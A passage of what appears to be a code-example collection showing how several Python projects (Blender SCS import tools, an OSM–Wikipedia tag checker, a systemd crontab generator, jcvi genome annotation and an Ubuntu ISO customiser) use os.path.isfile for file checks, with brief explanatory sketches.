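        fname = os.path.join(output_dir, lib)
    if not os.path.isfile(fname):
        raise RuntimeError('File not found %r' % lib)
    return fname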

Example 4

Project: BlenderTools
Source File: pix.py
def load(context, filepath):
    """

    :param context: Blender Context currently used for window_manager.update_progress and bpy_object_utils.object_data_add
    :type context: bpy.types.Context
    :param filepath: File path to be imported
    :type filepath: str
    :return: Return state statuses (Usually 'FINISHED')
    :rtype: dict
    """
    import time

    t = time.time()
    bpy.context.window.cursor_modal_set('WAIT')
    scs_globals = _get_scs_globals()
    lprint("", report_errors=-1, report_warnings=-1)  # Clear the 'error_messages' and 'warning_messages'

    collision_locators = []
    prefab_locators = []
    loaded_variants = []
    loaded_looks = []
    objects = []
    locators = []
    mats_info = []
    scs_root_object = skeleton = bones = armature = None

    # TRANSITIONAL STRUCTURES
    terrain_points = TerrainPntsTrans()

    # IMPORT PIP -> has to be loaded before PIM because of terrain points
    if scs_globals.import_pip_file:
        pip_filepath = str(filepath[:-1] + 'p')
        if os.path.isfile(pip_filepath):
            lprint('\nD PIP filepath:\n  %s', (pip_filepath,))
            # print('PIP filepath:\n  %s' % pip_filepath)
            result, prefab_locators = _pip.load(pip_filepath, terrain_points)
        else:
            lprint('\nI No PIP file.')
            # print('INFO - No PIP file.')

    # IMPORT PIM
    if scs_globals.import_pim_file or scs_globals.import_pis_file:
        if filepath:
            if os.path.isfile(filepath):
                lprint('\nD PIM filepath:\n  %s', (_path_utils.readable_norm(filepath),))
                result, objects, locators, armature, skeleton, mats_info = _pim.load(
                    context,
                    filepath,
                    terrain_points_trans=terrain_points
                )
                # print('  armature:\n%s\n  skeleton:\n%s' % (str(armature), str(skeleton)))
            else:
                lprint('\nI No file found at %r!' % (_path_utils.readable_norm(filepath),))
        else:
            lprint('\nI No filepath provided!')

    # IMPORT PIT
    bpy.context.scene.objects.active = None
    if scs_globals.import_pit_file:
        pit_filepath = str(filepath[:-1] + 't')
        if os.path.isfile(pit_filepath):
            lprint('\nD PIT filepath:\n  %s', (pit_filepath,))
            # print('PIT filepath:\n  %s' % pit_filepath)
            result, loaded_variants, loaded_looks = _pit.load(pit_filepath)
        else:
            lprint('\nI No PIT file.')
            # print('INFO - No PIT file.')

    # IMPORT PIC
    if scs_globals.import_pic_file:
        pic_filepath = str(filepath[:-1] + 'c')
        if os.path.isfile(pic_filepath):
            lprint('\nD PIC filepath:\n  %s', (pic_filepath,))
            # print('PIC filepath:\n  %s' % pic_filepath)
            result, collision_locators = _pic.load(pic_filepath)
        else:
            lprint('\nI No PIC file.')
            # print('INFO - No PIC file.')

    # SETUP 'SCS GAME OBJECTS'
    for item in collision_locators:
        locators.append(item)
    for item in prefab_locators:
        locators.append(item)
    path, file = os.path.split(filepath)
    # print('  path: %r\n  file: %r' % (path, file))
    lod_name, ext = os.path.splitext(file)
    if objects or locators or (armature and skeleton):
        scs_root_object = _create_scs_root_object(lod_name, loaded_variants, loaded_looks, mats_info, objects, locators, armature)

    # IMPORT PIS
    if scs_globals.import_pis_file:
        # pis file path is created from directory of pim file and skeleton definition inside pim header
        pis_filepath = os.path.dirname(filepath) + os.sep + skeleton
        if os.path.isfile(pis_filepath):
            lprint('\nD PIS filepath:\n  %s', (pis_filepath,))

            # fill in custom data if PIS file is from other directory
            if skeleton[:-4] != scs_root_object.name:
                armature.scs_props.scs_skeleton_custom_export_dirpath = "//" + os.path.relpath(os.path.dirname(pis_filepath),
                                                                                               scs_globals.scs_project_path)
                armature.scs_props.scs_skeleton_custom_name = os.path.basename(skeleton[:-4])

            bones = _pis.load(pis_filepath, armature)
        else:
            bones = None
            lprint('\nI No PIS file.')

        # IMPORT PIA
        if scs_globals.import_pia_file and bones:
            basepath = os.path.dirname(filepath)
            # Search for PIA files in model's directory and its subdirectories...
            lprint('\nD Searching the directory for PIA files:\n   %s', (basepath,))
            # print('\nSearching the directory for PIA files:\n   %s' % str(basepath))
            pia_files = []
            index = 0
            for root, dirs, files in os.walk(basepath):
                if not scs_globals.include_subdirs_for_pia:
                    if index > 0:
                        break
                # print('  root: %s - dirs: %s - files: %s' % (str(root), str(dirs), str(files)))
                for file in files:
                    if file.endswith(".pia"):
                        pia_filepath = os.path.join(root, file)
                        pia_files.append(pia_filepath)
                index += 1

            if len(pia_files) > 0:
                lprint('D PIA files found:')
                for pia_filepath in pia_files:
                    lprint('D %r', pia_filepath)
                # print('armature: %s\nskeleton: %r\nbones: %s\n' % (str(armature), str(skeleton), str(bones)))
                _pia.load(scs_root_object, pia_files, armature, pis_filepath, bones)
            else:
                lprint('\nI No PIA files.')

    # fix scene objects count so it won't trigger copy cycle
    bpy.context.scene.scs_cached_num_objects = len(bpy.context.scene.objects)

    # Turn on Textured Solid in 3D view...
    for bl_screen in bpy.data.screens:
        for bl_area in bl_screen.areas:
            for bl_space in bl_area.spaces:
                if bl_space.type == 'VIEW_3D':
                    bl_space.show_textured_solid = True

    # Turn on GLSL in 3D view...
    bpy.context.scene.game_settings.material_mode = 'GLSL'

    # Turn on "Frame Dropping" for animation playback...
    bpy.context.scene.use_frame_drop = True

    # FINAL FEEDBACK
    bpy.context.window.cursor_modal_restore()
    lprint('\nI Import completed in %.3f sec.', time.time() - t, report_errors=True, report_warnings=True)
    return True
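
Example 4 derives each companion file (.pip, .pit, .pic) from the .pim path by swapping the final character, and os.path.isfile decides whether that companion gets imported at all. The probe in isolation (sibling() and existing_companions() are hypothetical helpers):

import os

def sibling(pim_path, last_char):
    # 'model.pim' -> 'model.pip' / 'model.pit' / 'model.pic'
    return pim_path[:-1] + last_char

def existing_companions(pim_path):
    return [p for p in (sibling(pim_path, c) for c in 'ptc') if os.path.isfile(p)]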

Example 5

Project: BlenderTools
Source File: import_pmx.py
def load(
        operator,
        context,
        filepath,
        ):
    import time

    t = time.time()
    bpy.context.window.cursor_modal_set('WAIT')
    # import_scale = bpy.data.worlds[0].scs_globals.import_scale
    # load_textures = bpy.data.worlds[0].scs_globals.load_textures
    # mesh_creation_type = bpy.data.worlds[0].scs_globals.mesh_creation_type
    dump_level = int(bpy.data.worlds[0].scs_globals.dump_level)

    prefab_locators = []
    objects = []
    locators = []
    armature = skeleton = None

    # ## NEW SCENE CREATION
    # if bpy.data.worlds[0].scs_globals.scs_lod_definition_type == 'scenes':
    #     if context.scene.name != 'Scene':
    #         bpy.ops.scene.new(type='NEW')

## IMPORT PMG (PIM)
    if bpy.data.worlds[0].scs_globals.import_pmg_file or bpy.data.worlds[0].scs_globals.import_pis_file:
        if filepath:
            if os.path.isfile(filepath):
                Print(dump_level, '\nD PMG filepath:\n  %s', str(filepath).replace("\\", "/"))
                # result, objects, locators, armature, skeleton = import_pmg.load(operator, context, filepath)
            else:
                Print(dump_level, '\nI No file found at %r!' % str(filepath).replace("\\", "/"))
        else:
            Print(dump_level, '\nI No filepath provided!')

# ## IMPORT PIT
#     if bpy.data.worlds[0].scs_globals.import_pit_file:
#         pit_filepath = str(filepath[:-1] + 't')
#         if os.path.isfile(pit_filepath):
#             Print(dump_level, '\nD PIT filepath:\n  %s', pit_filepath)
#             # print('PIT filepath:\n  %s' % pit_filepath)
#             result = import_pit.load(operator, context, pit_filepath)
#         else:
#             Print(dump_level, '\nI No PIT file.')
#             # print('INFO - No PIT file.')

# ## IMPORT PIC
#     if bpy.data.worlds[0].scs_globals.import_pic_file:
#         pic_filepath = str(filepath[:-1] + 'c')
#         if os.path.isfile(pic_filepath):
#             Print(dump_level, '\nD PIC filepath:\n  %s', pic_filepath)
#             # print('PIC filepath:\n  %s' % pic_filepath)
#         else:
#             Print(dump_level, '\nI No PIC file.')
#             # print('INFO - No PIC file.')

# ## IMPORT PIP
#     if bpy.data.worlds[0].scs_globals.import_pip_file:
#         pip_filepath = str(filepath[:-1] + 'p')
#         if os.path.isfile(pip_filepath):
#             Print(dump_level, '\nD PIP filepath:\n  %s', pip_filepath)
#             # print('PIP filepath:\n  %s' % pip_filepath)
#             result, prefab_locators = import_pip.load(operator, context, pip_filepath)
#         else:
#             Print(dump_level, '\nI No PIP file.')
#             # print('INFO - No PIP file.')

# ## IMPORT PIS
#     if bpy.data.worlds[0].scs_globals.import_pis_file:
#         pis_filepath = str(filepath[:-1] + 's')
#         if os.path.isfile(pis_filepath):
#             Print(dump_level, '\nD PIS filepath:\n  %s', pis_filepath)
#             # print('PIS filepath:\n  %s' % pis_filepath)
#             result, bones = import_pis.load(operator, context, pis_filepath, armature)
#         else:
#             bones = None
#             Print(dump_level, '\nI No PIS file.')
#             # print('INFO - No PIS file.')

# ## IMPORT PIA
#     if bpy.data.worlds[0].scs_globals.import_pis_file and bpy.data.worlds[0].scs_globals.import_pia_file:
#         basepath = os.path.dirname(filepath)
#         ## Search for PIA files in model's directory and its subdirectories...
#         Print(dump_level, '\nI Searching the directory for PIA files:\n   %s', str(basepath))
#         # print('\nSearching the directory for PIA files:\n   %s' % str(basepath))
#         pia_files = []
#         index = 0
#         for root, dirs, files in os.walk(basepath):
#             if not bpy.data.worlds[0].scs_globals.include_subdirs_for_pia:
#                 if index > 0:
#                     break
#             # print('  root: %s - dirs: %s - files: %s' % (str(root), str(dirs), str(files)))
#             for file in files:
#                 if file.endswith(".pia"):
#                     pia_filepath = os.path.join(root, file)
#                     pia_files.append(pia_filepath)
#             index += 1
#
#         if len(pia_files) > 0:
#             if dump_level > 1:
#                 Print(dump_level, 'I PIA files found:')
#                 for pia_filepath in pia_files: Print(dump_level, 'I %r', pia_filepath)
#             # print('armature: %s\nskeleton: %r\nbones: %s\n' % (str(armature), str(skeleton), str(bones)))
#             result = import_pia.load(operator, context, pia_files, armature, skeleton, bones)
#             # print('  result: %s' % str(result))
#         else:
#             Print(dump_level, '\nI No PIA files.')

## SETUP LODS
    for item in prefab_locators:
        locators.append(item)
    path, file = os.path.split(filepath)
    # print('  path: %r\n  file: %r' % (path, file))
    lod_name, ext = os.path.splitext(file)
    # print('  root: %r\n  ext: %r' % (root, ext))
    # if bpy.data.worlds[0].scs_globals.scs_lod_definition_type == 'scenes':
    #     print('LODs as Scenes...')
    #     context.scene.name = lod_name
    #     context.scene.scs_props.scene_lod = True
    # else:
    print('LODs as Objects...')
    if objects:
        create_lod_empty(lod_name, objects, locators, armature, skeleton)

## SET DRAW MODES
    ## Turn on Textured Solid in 3D view...
    for bl_screen in bpy.data.screens:
        for bl_area in bl_screen.areas:
            for bl_space in bl_area.spaces:
                if bl_space.type == 'VIEW_3D':
                    bl_space.show_textured_solid = True

                    # bl_space.viewport_shade = 'WIREFRAME'
                    # bl_space.show_manipulator = True
                    bl_space.transform_orientation = 'NORMAL'
                    bl_space.transform_manipulators = {'ROTATE'}

    ## Turn on GLSL in 3D view...
    bpy.context.scene.game_settings.material_mode = 'GLSL'

## TURN ON SCS TOOLS
    # bpy.context.scene.scs_props.locator_size = 10.0 # TMP: increase locators' size

    bpy.context.window.cursor_modal_restore()
    Print(dump_level, '\nI files imported (in %.3f sec)', time.time() - t)

Example 6

    def read_config(self):
        """Setup configurations
        """
        # Program version
        self.version = "v0.4"

        #Read configuration from config files
        configFile = "config.cfg"
        if not os.path.isfile(configFile):
            call("cp %s %s" % ("config.template", configFile), shell=True)
            print "* A new config file has been created:\n  %s\n\n  Fill it with the necessary information (see README.md and config.template)." % configFile
            answer = raw_input("\n  Continue? [Y/n]\n")
            if answer not in ("", "Y", "y"):
                sys.exit()
        configparser = ConfigParser.RawConfigParser()
        configparser.optionxform = str
        configparser.read(configFile)
        #country
        self.WIKIPEDIALANG = configparser.get("general", "preferred language")
        self.category_translation = configparser.get("general",
                                                     "category translation")
        self.country = configparser.get("general", "country")
        self.OSMDIR = configparser.get("general", "osmdir")
        self.COUNTRYBBOX = configparser.get("general", "osmbbox")
        self.countryPoly = os.path.join("data", "OSM", "%s.poly" % self.country)
        if not os.path.isfile(self.countryPoly):
            print "\n* Poly file is missing: \n  %s" % self.countryPoly
            sys.exit(1)
        if self.WIKIPEDIALANG == "" or self.country == "" or self.OSMDIR == "":
            print "\n* Fill in `config.cfg` file the following options: `osmdir`, `preferred language`, `country`"
            sys.exit(1)
        #regions names
        if not configparser.has_option("general", "regions names") or \
                configparser.get("general", "regions names") == "":
            self.regionsNames = []
        else:
            self.regionsNames = [r.decode("utf-8") \
            for r in configparser.get("general", "regions names").split("|")]
        # directory where html files must be copied after creation
        #(for example, Dropbox dir)
        self.OUTDIR = configparser.get("general", "outdir")
        #debugging
        self.print_categories_to_text_files = configparser.get("debug", "print categories to text files")
        self.clickable_cells = configparser.get("debug", "clickable cells")
        # user agent for requests to Wikipedia and Quick Intersections APIs
        self.user_agent = configparser.get("general", "user agent")
        if self.user_agent == "":
            sys.exit("* Error: please, fill 'user agent' option in the "
                     "config file.\n"
                     "The User-Agent will be used when making requests to "
                     "Wikipedia API and Quick Intersections.\n"
                     "User agent example: wikipedia-tags-in-osm ("
                     "https://openstreetmap.it/wikipedia-tags-in-osm; "
                     "[email protected])")
        #themes and categories
        themesAndCatsNames = {}
        for themeName in configparser.options("themes"):
            categoriesNames = [c.strip().replace(" ", "_").decode("utf-8") for c in configparser.get("themes", themeName).split("|")]
            themesAndCatsNames[themeName.replace(" ", "_").decode("utf-8")] = categoriesNames
        # Wikipedia categories data, downloaded from quick_intersection
        self.CATSCANDIR = os.path.join("data", "wikipedia", "catscan")
        self.make_dir(self.CATSCANDIR)
        #categories dates
        self.categoriesDates = {}
        catsDatesFile = os.path.join(self.CATSCANDIR, "update_dates.cfg")
        catsDatesConfigparser = ConfigParser.RawConfigParser()
        catsDatesConfigparser.optionxform = str
        if not os.path.isfile(catsDatesFile):
            catsDatesConfigparser.add_section('catscan dates')
            with open(catsDatesFile, 'wb') as configfile:
                catsDatesConfigparser.write(configfile)
        else:
            catsDatesConfigparser.read(catsDatesFile)
            for categoryName, date in catsDatesConfigparser.items("catscan dates"):
                self.categoriesDates[categoryName] = date

        # OSM data
        self.countryPBF = os.path.join(self.OSMDIR, "%s-latest.osm.pbf" % self.country)
        self.oldCountryPBF = os.path.join(self.OSMDIR, "%s.osm.pbf" % self.country)
        self.countryO5M = os.path.join(self.OSMDIR, "%s-latest.o5m" % self.country)
        self.oldCountryO5M = os.path.join(self.OSMDIR, "%s.o5m" % self.country)
        self.osmObjs = {}
        # OSM data with wikipedia tag
        self.wOSMFile = os.path.join("data", "OSM", "Wikipedia-data-in-OSM.osm")
        # OSM data SQlite database
        self.wOSMdb = os.path.join("data", "OSM", "Wikipedia-data-in-OSM.sqlite")
        # libspatialite path
        self.libspatialitePath = configparser.get("general", "libspatialite-path")
        # OSM data of foreign countries
        self.FOREIGNOSMDIR = "/tmp/"
        # lists of categories and articles that should be ignored
        # (not geographic content)
        self.NONMAPPABLE = os.path.join("data", "wikipedia", "non_mappable")
        self.make_dir(self.NONMAPPABLE)
        for fileName in ("articles", "subcategories", "redirects"):
            fullName = os.path.join(self.NONMAPPABLE, fileName)
            if not os.path.isfile(fullName):
                open(fullName, "w").close()
        # workaround files
        workaroundDir = os.path.join("data", "workaround")
        self.make_dir(workaroundDir)
        fileName = os.path.join(workaroundDir, "tagged.csv")
        if not os.path.isfile(fileName):
            f = open(fileName, "w")
            f.write("#In case the parser doesn't discover a tagged article, \
it can be added here, so that it will anyhow appear in the webpages.\n\
#Article	nosmid,wosmid,wosmid,rosmid...")
            f.close()
        fileName = os.path.join(workaroundDir, "false_positive_tags.csv")
        if not os.path.isfile(fileName):
            f = open(fileName, "w")
            f.write("#If the script flags a correct tag as an error, write \
the tag here and it will not be detected as error anymore.")
            f.close()
        # conversions foreign articles titles - preferred language articles
        self.WIKIPEDIAANSWERS = os.path.join("data", "wikipedia", "answers")
        self.WIKIPEDIAANSWER = os.path.join(self.WIKIPEDIAANSWERS, "answer")
        self.make_dir(self.WIKIPEDIAANSWERS)
        # web pages dir
        self.HTMLDIR = 'html'
        self.make_dir(os.path.join(self.HTMLDIR, "GeoJSON"))
        self.make_dir(os.path.join(self.HTMLDIR, "json"))
        self.UPDATETIME = time.strftime("%b %d, ore %H", time.localtime())
        # stats and logs dir
        statsDir = os.path.join("data", "stats")
        self.make_dir(statsDir)
        self.make_dir(os.path.join("data", "logs"))
        # templates dir
        self.MISSINGTEMPLATESDIR = os.path.join("data", "wikipedia", "missing_templates")
        self.make_dir(self.MISSINGTEMPLATESDIR)
        self.TEMPLATESSTATUSFILE = os.path.join(self.MISSINGTEMPLATESDIR, "missing_templates.csv")

        supported_locales = configparser.get("i18n", "supported_locales")
        self.SUPPORTED_LOCALES = [lcode.strip()
                                  for lcode in supported_locales.split('|')
                                  ]

        return themesAndCatsNames
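
Example 6 applies the same initialize-if-missing shape over and over: when os.path.isfile returns False, create the file with default content; otherwise use what is already there. The shape reduced to a hypothetical ensure_file() helper:

import os

def ensure_file(path, default_content=""):
    # First run: create the file with default content; later runs leave it untouched.
    if not os.path.isfile(path):
        with open(path, "w") as f:
            f.write(default_content)
    return path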

Example 7

def generate_timer_unit(job, seq):
    persistent = job['P']
    command = job['c']
    parts = command.split()
    testremoved = None
    standardoutput = None
    delay = job['b']
    daemon_reload = os.path.isfile(REBOOT_FILE)

    try:
        home = pwd.getpwnam(job['u']).pw_dir
    except KeyError:
        home = None

    # perform smart substitutions for known shells
    if job['s'] in KSH_SHELLS:
        if home and command.startswith('~/'):
            command = home + command[1:]

        if (len(parts) >= 3 and
            parts[-2] == '>' and
            parts[-1] == '/dev/null'):
            command = ' '.join(parts[0:-2])
            parts = command.split()
            standardoutput = 'null'

        if (len(parts) >= 2 and
            parts[-1] == '>/dev/null'):
            command = ' '.join(parts[0:-1])
            parts = command.split()
            standardoutput = 'null'

        if (len(parts) == 6 and
            parts[0] == '[' and
            parts[1] in ['-x','-f','-e'] and
            parts[2] == parts[5] and
            parts[3] == ']' and
            parts[4] == '&&' ):
                testremoved = parts[2]
                command = ' '.join(parts[5:])
                parts = command.split()

        if (len(parts) == 5 and
            parts[0] == 'test' and
            parts[1] in ['-x','-f','-e'] and
            parts[2] == parts[4] and
            parts[3] == '&&' ):
                testremoved = parts[2]
                command = ' '.join(parts[4:])
                parts = command.split()

        if testremoved and not os.path.isfile(testremoved): return

        if (len(parts) == 6 and
            parts[0] == '[' and
            parts[1] in ['-d','-e'] and
            parts[2] == '/run/systemd/system' and
            parts[3] == ']' and
            parts[4] == '||'): return

        if (len(parts) == 5 and
            parts[0] == 'test' and
            parts[1] in ['-d','-e'] and
            parts[2] == '/run/systemd/system' and
            parts[3] == '||'): return

        # TODO: translate  'command%line1%line2%line3
        # in '/bin/echo -e line1\\nline2\\nline3 | command'
        # to be POSIX compliant

    if 'p' in job:
        hour = job['h']

        if job['p'] == 'reboot':
            if daemon_reload: return
            if delay == 0: delay = 1
            schedule = None
            persistent = False
        elif job['p'] == 'minutely':
            schedule = job['p']
            persistent = False
        elif job['p'] == 'hourly' and delay == 0:
            schedule = 'hourly'
        elif job['p'] == 'hourly':
            schedule = '*-*-* *:%s:0' % delay
            delay = 0
        elif job['p'] == 'midnight' and delay == 0:
            schedule = 'daily'
        elif job['p'] == 'midnight':
            schedule = '*-*-* 0:%s:0' % delay
        elif job['p'] in TIME_UNITS_SET and hour == 0 and delay == 0:
            schedule = job['p']
        elif job['p'] == 'daily':
            schedule = '*-*-* %s:%s:0' % (hour, delay)
        elif job['p'] == 'weekly':
            schedule = 'Mon *-*-* %s:%s:0' % (hour, delay)
        elif job['p'] == 'monthly':
            schedule = '*-*-1 %s:%s:0' % (hour, delay)
        elif job['p'] == 'quarterly':
            schedule = '*-1,4,7,10-1 %s:%s:0' % (hour, delay)
        elif job['p'] == 'semi-annually':
            schedule = '*-1,7-1 %s:%s:0' % (hour, delay)
        elif job['p'] == 'yearly':
            schedule = '*-1-1 %s:%s:0' % (hour, delay)
        else:
            try:
                if int(job['p']) > 31:
                    # workaround for anacrontab
                    schedule = '*-1/%s-1 %s:%s:0' % (int(round(job['p']/30)), hour, delay)
                else:
                    schedule = '*-*-1/%s %s:%s:0' % (int(job['p']), hour, delay)
            except ValueError:
                log(3, 'unknown schedule in %s: %s' % (job['f'], job['l']))
                schedule = job['p']

    else:
        dows = ','.join(job['w'])
        dows = '' if dows == '*' else dows + ' '
        if 0 in job['M']: job['M'].remove(0)
        if 0 in job['d']: job['d'].remove(0)
        if not len(job['M']) or not len(job['d']) or not len(job['h']) or not len(job['m']):
            return
        schedule = '%s*-%s-%s %s:%s:00' % (dows, ','.join(map(str, job['M'])),
                ','.join(map(str, job['d'])), ','.join(map(str, job['h'])), ','.join(map(str, job['m'])))

    if not persistent:
        unit_id = next(seq)
    else:
        unit_id = hashlib.md5()
        unit_id.update(bytes('\0'.join([schedule, command]), 'utf-8'))
        unit_id = unit_id.hexdigest()
    unit_name = "cron-%s-%s-%s" % (job['j'], job['u'], unit_id)

    if not (len(parts) == 1 and os.path.isfile(command)):
        with open('%s/%s.sh' % (TARGET_DIR, unit_name), 'w', encoding='utf8') as f:
            f.write(command)
        command = job['s'] + ' ' + TARGET_DIR + '/' + unit_name + '.sh'

    with open('%s/%s.timer' % (TARGET_DIR, unit_name), 'w' , encoding='utf8') as f:
        f.write('[Unit]\n')
        f.write('Description=[Timer] "%s"\n' % job['l'])
        f.write('Documentation=man:systemd-crontab-generator(8)\n')
        f.write('PartOf=cron.target\n')
        f.write('RefuseManualStart=true\n')
        f.write('RefuseManualStop=true\n')
        f.write('SourcePath=%s\n' % job['f'])
        if testremoved: f.write('ConditionFileIsExecutable=%s\n' % testremoved)

        f.write('\n[Timer]\n')
        f.write('Unit=%s.service\n' % unit_name)
        if schedule: f.write('OnCalendar=%s\n' % schedule)
        else:        f.write('OnBootSec=%sm\n' % delay)
        if job['a'] != 1: f.write('AccuracySec=%sm\n' % job['a'])
        if @persistent@ and persistent: f.write('Persistent=true\n')

    try:
        os.symlink('%s/%s.timer' % (TARGET_DIR, unit_name), '%s/%s.timer' % (TIMERS_DIR, unit_name))
    except OSError as e:
        if e.errno != errno.EEXIST:  # use the errno module; os.errno is not a public API
            raise

    with open('%s/%s.service' % (TARGET_DIR, unit_name), 'w', encoding='utf8') as f:
        f.write('[Unit]\n')
        f.write('Description=[Cron] "%s"\n' % job['l'])
        f.write('Documentation=man:systemd-crontab-generator(8)\n')
        f.write('RefuseManualStart=true\n')
        f.write('RefuseManualStop=true\n')
        f.write('SourcePath=%s\n' % job['f'])
        if '"MAILTO="' in job['e']:
            pass # mails explicitly disabled
        elif not HAS_SENDMAIL and '"MAILTO=' not in job['e']:
            pass # mails automatically disabled
        else:
            f.write('OnFailure=cron-failure@%i.service\n')
        if job['u'] != 'root' or job['f'] == '@statedir@/root':
            f.write('Requires=systemd-user-sessions.service\n')
            if home: f.write('RequiresMountsFor=%s\n' % home)

        f.write('\n[Service]\n')
        f.write('Type=oneshot\n')
        f.write('IgnoreSIGPIPE=false\n')
        if schedule and delay: f.write('ExecStartPre=-@libdir@/@package@/boot_delay %s\n' % delay)
        f.write('ExecStart=%s\n' % command)
        if job['e']: f.write('Environment=%s\n' % job['e'])
        if job['u'] != 'root': f.write('User=%s\n' % job['u'])
        if standardoutput: f.write('StandardOutput=%s\n' % standardoutput)
        if job['Z']:
             f.write('CPUSchedulingPolicy=idle\n')
             f.write('IOSchedulingClass=idle\n')

    return '%s.timer' % unit_name
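
Note: two os.path.isfile calls carry this generator: one honours crontab guard
prefixes such as '[ -x FILE ] && ...' (the unit is simply not generated when
FILE is gone), the other decides whether the command can be executed directly
or must be wrapped in a helper shell script. A minimal, hypothetical sketch of
the guard idea, not the generator's actual code:

import os

# Once the '[ -x FILE ] &&' prefix has been stripped into 'testremoved',
# only emit a unit while FILE still exists on disk.
def should_generate(testremoved):
    return testremoved is None or os.path.isfile(testremoved)

print(should_generate('/usr/bin/foo'))  # False unless /usr/bin/foo exists
print(should_generate(None))            # True: the job had no guard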

Example 8

Project: jcvi
Source File: reformat.py
View license
def annotate(args):
    """
    %prog annotate new.bed old.bed 2> log

    Annotate the `new.bed` with features from `old.bed` for the purpose of
    gene numbering.

    Ambiguity in ID assignment can be resolved by either of the following 2 methods:
    - `alignment`: make use of global sequence alignment score (calculated by `needle`)
    - `overlap`: make use of overlap length (calculated by `intersectBed`)

    Transfer over as many identifiers as possible while following guidelines:
    http://www.arabidopsis.org/portals/nomenclature/guidelines.jsp#editing

    Note: Following RegExp pattern describes the structure of the identifier
    assigned to features in the `new.bed` file.

    new_id_pat = re.compile(r"^\d+\.[cemtx]+\S+")

    Examples: 23231.m312389, 23231.t004898, 23231.tRNA.144
    Adjust the value of `new_id_pat` manually as per your ID naming conventions.
    """
    from jcvi.utils.grouper import Grouper

    valid_resolve_choices = ["alignment", "overlap"]

    p = OptionParser(annotate.__doc__)
    p.add_option("--resolve", default="alignment", choices=valid_resolve_choices,
                 help="Resolve ID assignment based on a certain metric" \
                        + " [default: %default]")
    p.add_option("--atg_name", default=False, action="store_true",
                help="Specify if locus IDs in `new.bed` file follow ATG nomenclature" \
                        + " [default: %default]")

    g1 = OptionGroup(p, "Optional parameters (alignment):\n" \
            + "Use if resolving ambiguities based on sequence `alignment`")
    g1.add_option("--pid", dest="pid", default=35., type="float",
            help="Percent identity cutoff [default: %default]")
    g1.add_option("--score", dest="score", default=250., type="float",
            help="Alignment score cutoff [default: %default]")
    p.add_option_group(g1)

    g2 = OptionGroup(p, "Optional parameters (overlap):\n" \
            + "Use if resolving ambiguities based on `overlap` length\n" \
            + "Parameters equivalent to `intersectBed`")
    g2.add_option("-f", dest="f", default=0.5, type="float",
            help="Minimum overlap fraction (0.0 - 1.0) [default: %default]")
    g2.add_option("-r", dest="r", default=False, action="store_true",
            help="Require fraction overlap to be reciprocal [default: %default]")
    g2.add_option("-s", dest="s", default=True, action="store_true",
            help="Require same strandedness [default: %default]")
    p.add_option_group(g2)

    opts, args = p.parse_args(args)

    if len(args) != 2:
        sys.exit(not p.print_help())

    nbedfile, obedfile = args
    npf, opf = nbedfile.rsplit(".", 1)[0], obedfile.rsplit(".", 1)[0]

    # Make consolidated.bed
    cbedfile = "consolidated.bed"
    if not os.path.isfile(cbedfile):
        consolidate(nbedfile, obedfile, cbedfile)
    else:
        logging.warning("`{0}` already exists. Skipping step".format(cbedfile))

    logging.warning("Resolving ID assignment ambiguity based on `{0}`".\
            format(opts.resolve))

    if opts.resolve == "alignment":
        # Get pairs and prompt to run needle
        pairsfile = "nw.pairs"
        scoresfile = "nw.scores"
        if not os.path.isfile(pairsfile):
            get_pairs(cbedfile, pairsfile)
        else:
            logging.warning("`{0}` already exists. Checking for needle output".\
                    format(pairsfile))

        # If needle scores do not exist, prompt user to run needle
        if not os.path.isfile(scoresfile):
            logging.error("`{0}` does not exist. Please process {1} using `needle`".\
                    format(scoresfile, pairsfile))
            sys.exit()
    else:
        scoresfile = "ovl.scores"
        # Calculate overlap length using intersectBed
        calculate_ovl(nbedfile, obedfile, opts, scoresfile)

    logging.warning("`{0}` exists. Storing scores in memory".\
            format(scoresfile))
    scores = read_scores(scoresfile, opts)

    # Iterate through consolidated bed and
    # filter piles based on score
    abedline = {}

    cbed = Bed(cbedfile)
    g = Grouper()
    for c in cbed:
        accn = c.accn
        g.join(*accn.split(";"))

    nbedline = {}
    nbed = Bed(nbedfile)
    for line in nbed: nbedline[line.accn] = line

    splits = set()
    for chr, chrbed in nbed.sub_beds():
        abedline, splits = annotate_chr(chr, chrbed, g, scores, nbedline, abedline, opts, splits)

    if splits is not None:
        abedline = process_splits(splits, scores, nbedline, abedline)

    abedfile = npf + ".annotated.bed"
    afh = open(abedfile, "w")
    for accn in abedline:
        print >> afh, abedline[accn]
    afh.close()

    sort([abedfile, "-i"])
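
Note: annotate() also uses os.path.isfile as a cheap memoisation check:
expensive steps (consolidate, get_pairs) are skipped whenever their output
file already exists. A minimal sketch of that idiom, with illustrative names:

import os
import logging

# Rebuild 'path' only when it is missing; otherwise warn and reuse it,
# mirroring the consolidated.bed / nw.pairs handling above.
def ensure_file(path, build):
    if not os.path.isfile(path):
        build(path)
    else:
        logging.warning("`%s` already exists. Skipping step", path)

ensure_file("consolidated.bed", lambda p: open(p, "w").close())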

Example 9

Project: Customizer
Source File: rebuild.py
View license
def main():
    common.check_filesystem()

    # Basic sanity checks of files and paths that absolutely need to exist.
    message.sub_info('Doing sanity checks')
    lsb_file = misc.join_paths(config.FILESYSTEM_DIR, 'etc/lsb-release')
    if not os.path.isfile(lsb_file):
        raise(message.exception(lsb_file + ' does not exist'))

    isolinux_dir = misc.join_paths(config.ISO_DIR, 'isolinux')
    if not os.path.isdir(isolinux_dir):
        raise(message.exception(isolinux_dir + ' does not exist'))

    if misc.search_file('999:999', misc.join_paths(config.FILESYSTEM_DIR, 'etc/passwd')):
        raise(message.exception('User with UID 999 exists, this means automatic login will fail'))
    elif misc.search_file('999:999', misc.join_paths(config.FILESYSTEM_DIR, 'etc/group')):
        raise(message.exception('Group with GID 999 exists, this means automatic login will fail'))

    casper_dir = misc.join_paths(config.ISO_DIR, 'casper')
    if not os.path.isdir(casper_dir):
        message.sub_debug('Creating', casper_dir)
        os.makedirs(casper_dir)

    base_file = misc.join_paths(config.ISO_DIR, '.disk/base_installable')
    if os.path.isfile(misc.join_paths(config.FILESYSTEM_DIR, 'usr/bin/ubiquity')):
        if not os.path.isfile(base_file):
            message.sub_debug('Creating', base_file)
            misc.write_file(base_file, '')
    elif os.path.isfile(base_file):
        message.sub_debug('Removing', base_file)
        os.unlink(base_file)

    # Acquire distribution information from the FileSystem
    message.sub_info('Gathering information')
    arch = misc.chroot_exec(('dpkg', '--print-architecture'), prepare=False, \
        mount=False, output=True)
    distrib = common.get_value(config.FILESYSTEM_DIR + '/etc/lsb-release', \
        'DISTRIB_ID=')
    release = common.get_value(config.FILESYSTEM_DIR + '/etc/lsb-release', \
        'DISTRIB_RELEASE=')
